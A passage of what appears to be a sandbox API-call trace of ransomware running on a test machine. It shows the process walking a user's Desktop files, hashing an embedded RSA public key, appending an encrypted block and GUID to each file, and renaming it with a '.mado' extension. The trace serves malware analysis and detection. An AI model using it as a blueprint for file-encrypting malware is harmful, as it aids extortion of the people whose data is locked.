HALPmcxz\\Desktop\\0kcmGQ10PrrBAp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kcmgq10prrbap.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0kcmGQ10PrrBAp.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0kcmgq10prrbap.m4a.mado")) returned 1 [0203.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.720] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.721] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea23410, ftCreationTime.dwHighDateTime=0x1d5e820, ftLastAccessTime.dwLowDateTime=0xfe2c2090, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0xfe2c2090, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x313f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1Pj8-_DtMHl6Yj88dLx6.mkv", cAlternateFileName="1PJ8-_~1.MKV")) returned 1 [0203.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.721] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Pj8-_DtMHl6Yj88dLx6.mkv") returned=".mkv" [0203.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Pj8-_DtMHl6Yj88dLx6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1pj8-_dtmhl6yj88dlx6.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.721] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=12607) returned 1 [0203.721] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.723] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3119, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.723] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.725] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.725] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x313f, lpOverlapped=0x0) returned 1 [0203.725] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.726] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.726] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.726] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.726] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.727] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.727] GetLastError () returned 0x0 [0203.727] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.727] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.727] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.727] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.727] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3140) returned 0x3b6eb68 [0203.727] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dca0 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dce8 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.728] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b71cb0 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd58 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd70 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdde8 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b71cb0 | out: hHeap=0x2c0000) returned 1 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdd70 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdd58 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b682a8 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b683c0 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd70 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd58 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdde8 | out: hHeap=0x2c0000) returned 1 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.729] GetCurrentThreadId () returned 0x600 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323790 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.729] GetCurrentThreadId () returned 0x600 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde00 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fddd0 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde18 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.731] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x313f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.731] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.731] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.731] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.731] CloseHandle (hObject=0x63c) returned 1 [0203.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b6eb68 [0203.732] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Pj8-_DtMHl6Yj88dLx6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1pj8-_dtmhl6yj88dlx6.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1Pj8-_DtMHl6Yj88dLx6.mkv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1pj8-_dtmhl6yj88dlx6.mkv.mado")) returned 1 [0203.734] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b988f0, ftCreationTime.dwHighDateTime=0x1d5dae2, ftLastAccessTime.dwLowDateTime=0x5821e780, ftLastAccessTime.dwHighDateTime=0x1d5e665, ftLastWriteTime.dwLowDateTime=0x5821e780, ftLastWriteTime.dwHighDateTime=0x1d5e665, nFileSizeHigh=0x0, nFileSizeLow=0xa820, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2ejZWLY05H.xls", cAlternateFileName="2EJZWL~1.XLS")) returned 1 [0203.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0203.734] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2ejZWLY05H.xls") returned=".xls" [0203.734] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2ejZWLY05H.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2ejzwly05h.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.735] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=43040) returned 1 [0203.735] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.737] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa7fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.737] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.738] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa820, lpOverlapped=0x0) returned 1 [0203.739] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.739] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.739] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.739] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.740] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.740] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.740] CryptGetHashParam (in: hHash=0x32ef238, 